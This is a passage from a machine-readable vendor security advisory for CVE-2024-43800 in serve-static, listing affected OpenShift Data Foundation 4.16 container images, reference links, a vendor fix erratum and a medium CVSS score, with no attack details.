"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
